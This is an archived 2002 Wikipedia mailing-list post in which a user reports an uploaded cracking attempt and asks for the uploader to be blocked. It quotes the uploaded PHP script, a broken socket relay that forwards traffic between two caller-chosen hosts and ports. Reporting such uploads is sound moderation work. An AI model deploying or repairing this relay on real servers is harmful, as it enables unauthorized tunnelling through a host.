[Wikipedia-l] Uploaded cracking attempt
Pierre Abbat
phma at webjockey.net
Sat Nov 16 15:09:57 UTC 2002
LearII uploaded the following, which appears to be an attempt to read from
one port on one box and write to a port on another box. He also uploaded
another PHP file, which was an attempt to list the files on the server. PHP
doesn't run in the upload directory, and he left out the semicolons, but
would someone please block him?
phma
---
<html>
<body>
<?php
?arg1=a&arg2=b&arg3=c&arg4=d
$fp2 = fsockopen($arg1, $arg2)
$fp1 = fsockopen($arg3, $arg4)
set_socket_blocking($fp1, false)
set_socket_blocking($fp2, false)
while (1) {
$recvbuf = fgets( $fp1, 512)
fwrite($fp2,$recvbuf,strlen($recvbuf))
$recvbuf2 = fgets( $fp2, 512)
fwrite($fp1,$recvbuf2,strlen($recvbuf2))
}
fclose($fp1);
fclose($fp2);
}
?>
</body>
</html>
More information about the Wikipedia-l
mailing list